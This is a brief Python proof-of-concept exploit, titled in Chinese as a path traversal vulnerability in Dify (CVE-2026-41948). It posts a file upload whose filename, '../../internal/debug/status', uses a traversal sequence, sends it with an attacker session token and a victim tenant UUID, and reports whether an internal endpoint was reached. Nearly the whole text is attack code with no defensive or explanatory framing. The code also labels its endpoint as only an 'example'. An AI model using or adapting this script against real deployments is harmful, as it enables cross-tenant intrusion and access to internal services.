CVE-2026-41948 Dify路径遍历漏洞

import requests # Target Dify instance URL target_host = "http://vulnerable-dify-instance.com" # Attacker's session token (obtained via free registration) attacker_token = "<ATTACKER_SESSION_TOKEN>" # Victim tenant UUID required for exploitation victim_tenant_uuid = "<VICTIM_TENANT_UUID>" # Exploit endpoint (example) # The vulnerability allows traversing out of the tenant path via filename or task_id url = f"{target_host}/v1/files/upload" # Headers headers = { "Authorization": f"Bearer {attacker_token}", "X-Tenant-UUID": victim_tenant_uuid # May be required depending on config } # Malicious payload: Path traversal sequence to access internal debug endpoint # using unencoded dot sequences as described payload_filename = "../../internal/debug/status" files = { 'file': (payload_filename, 'dummy data') } try: response = requests.post(url, headers=headers, files=files) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") if response.status_code == 200: print("[+] Exploit successful! Internal endpoint accessed.") else: print("[-] Exploit failed or patched.") except Exception as e: print(f"Error: {e}")